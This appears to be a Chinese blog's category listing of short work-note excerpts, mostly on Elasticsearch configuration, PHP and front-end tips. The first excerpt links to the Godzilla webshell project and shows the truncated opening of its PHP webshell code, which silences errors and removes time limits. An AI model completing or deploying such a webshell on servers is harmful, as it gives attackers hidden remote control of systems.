文章分类 -  工作笔记

摘要:Github : https://github.com/BeichenDream/Godzilla <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i 阅读全文
posted @ 2022-06-06 15:35 我就丶是逗比 阅读(543) 评论(0) 推荐(0)
摘要:ES7 默认的单节点 shards 数量是 1000 个分片,那么在我们默认3个集群下就是 3000 的 shards 数量,今天在创建索引时提示 shards 数量不足,那么就使用下方代码进行修改 shards 数量配置 PUT /_cluster/settings { "persistent": 阅读全文
posted @ 2021-12-31 14:18 我就丶是逗比 阅读(1296) 评论(0) 推荐(0)
摘要:业务需求要在 ElasticSearch 中索引表中新增一个字段,直接使用 painless 操作 POST /index/_update_by_query { "script": { "lang": "painless", "inline": "if (ctx._source.type== nul 阅读全文
posted @ 2021-12-29 10:43 我就丶是逗比 阅读(275) 评论(0) 推荐(0)
摘要:1 /** 2 * [returnSquarePoint description] 3 * @param [type] $lng 精度 4 * @param [type] $lat 纬度 5 * @param float $distance 距离 以KM为单位 6 * @param integer 阅读全文
posted @ 2021-12-14 12:13 我就丶是逗比 阅读(216) 评论(0) 推荐(0)
摘要:Linux 安装 Elasticsearch 7.x Elasticsearch 官网:https://www.elastic.co/ Elasticsearch 下载地址:https://www.elastic.co/cn/downloads/elasticsearch Elasticsearch 阅读全文
posted @ 2021-12-06 20:28 我就丶是逗比 阅读(91) 评论(0) 推荐(0)
摘要:/etc/init.d/bt default 阅读全文
posted @ 2021-12-06 17:19 我就丶是逗比 阅读(1337) 评论(0) 推荐(0)
摘要:方便快捷: 1、先删 $('#table').bootstrapTable('destroy'); 2、重新渲染 $('#table').bootstrapTable({...param}); 阅读全文
posted @ 2021-11-26 17:10 我就丶是逗比 阅读(612) 评论(0) 推荐(0)